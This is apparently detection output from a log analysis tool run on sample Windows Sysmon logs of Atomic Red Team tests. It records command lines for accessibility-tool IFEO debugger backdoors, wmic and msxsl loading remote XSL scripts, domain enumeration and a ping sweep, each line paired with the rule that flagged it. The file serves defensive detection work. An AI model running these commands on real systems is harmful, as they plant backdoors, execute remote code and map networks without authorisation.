2019-07-19 23:50:14.678 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6888 | PGUID: 747F3D96-D8A6-5D31-0000-001053A73200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:14.692 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5972 | PGUID: 747F3D96-D8A6-5D31-0000-0010A5A93200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5972 | PGUID: 747F3D96-D8A6-5D31-0000-0010A5A93200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:14.827 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6664 | PGUID: 747F3D96-D8A6-5D31-0000-0010F9B13200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:17.941 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6068 | PGUID: 747F3D96-D8A9-5D31-0000-001072C43200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:17.963 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5124 | PGUID: 747F3D96-D8A9-5D31-0000-0010C0C63200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5124 | PGUID: 747F3D96-D8A9-5D31-0000-0010C0C63200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:18.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6016 | PGUID: 747F3D96-D8AA-5D31-0000-0010C0C93200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:19.467 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6244 | PGUID: 747F3D96-D8AB-5D31-0000-001054D03200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:19.491 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5632 | PGUID: 747F3D96-D8AB-5D31-0000-0010A5D23200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5632 | PGUID: 747F3D96-D8AB-5D31-0000-0010A5D23200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:19.549 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1888 | PGUID: 747F3D96-D8AB-5D31-0000-0010A4D53200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:25.376 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49727 (MSEDGEWIN10.home) | Dst: 172.217.17.132:80 (ams15s30-in-f4.1e100.net) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:25.376 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:50.046 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4004 | PGUID: 747F3D96-D8CA-5D31-0000-0010DA413300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:50.086 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6268 | PGUID: 747F3D96-D8CA-5D31-0000-0010CF443300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:53.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 948 | PGUID: 747F3D96-D8CC-5D31-0000-001038513300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:53.062 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1852 | PGUID: 747F3D96-D8CD-5D31-0000-001047543300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:55.991 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5380 | PGUID: 747F3D96-D8CF-5D31-0000-00109B603300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:56.047 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wmic.exe process /FORMAT:list | Process: C:\Windows\System32\wbem\WMIC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list"" | LID: 0x50951 | PID: 7040 | PGUID: 747F3D96-D8D0-5D31-0000-0010F3623300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:56.047 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious WMI Reconnaissance,,rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:56.182 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 396 | PGUID: 747F3D96-D8D0-5D31-0000-001034673300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:06.728 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5340 | PGUID: 747F3D96-D8DA-5D31-0000-0010D3833300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl | Process: C:\Windows\System32\wbem\WMIC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" | LID: 0x50951 | PID: 3220 | PGUID: 747F3D96-D8DA-5D31-0000-001029863300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,Evas | Exec,SquiblyTwo,,rules/sigma/process_creation/proc_creation_win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious WMI Reconnaissance,,rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,Evas,XSL Script Processing,,rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:06.888 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4016 | PGUID: 747F3D96-D8DA-5D31-0000-00100D8A3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:09.823 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4856 | PGUID: 747F3D96-D8DD-5D31-0000-0010EF923300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: net view /domain | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain"" | LID: 0x50951 | PID: 3012 | PGUID: 747F3D96-D8DD-5D31-0000-001043953300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Disc,Windows Network Enumeration,,rules/sigma/process_creation/proc_creation_win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:22.314 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1988 | PGUID: 747F3D96-D8EA-5D31-0000-001030B63300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: net view | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view"" | LID: 0x50951 | PID: 4684 | PGUID: 747F3D96-D8EA-5D31-0000-00108AB83300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Disc,Windows Network Enumeration,,rules/sigma/process_creation/proc_creation_win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:34.797 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3344 | PGUID: 747F3D96-D8F6-5D31-0000-00100FCB3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:35.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4528 | PGUID: 747F3D96-D8F6-5D31-0000-001091D13300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:35.038 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.1 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3876 | PGUID: 747F3D96-D8F7-5D31-0000-0010EDD33300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:35.579 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.2 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2084 | PGUID: 747F3D96-D8F7-5D31-0000-0010E3D83300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:35.988 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.3 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3068 | PGUID: 747F3D96-D8F7-5D31-0000-0010A7E13300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:36.549 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.4 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4376 | PGUID: 747F3D96-D8F8-5D31-0000-00108FE43300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:37.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.5 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3116 | PGUID: 747F3D96-D8F9-5D31-0000-00108BE73300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:37.513 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.6 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3868 | PGUID: 747F3D96-D8F9-5D31-0000-001073EA3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:38.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.7 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1020 | PGUID: 747F3D96-D8FA-5D31-0000-00105BED3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:38.517 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.8 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2292 | PGUID: 747F3D96-D8FA-5D31-0000-001043F03300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:39.028 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.9 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3612 | PGUID: 747F3D96-D8FB-5D31-0000-00108BF33300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:39.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.10 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5852 | PGUID: 747F3D96-D8FB-5D31-0000-001073F63300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
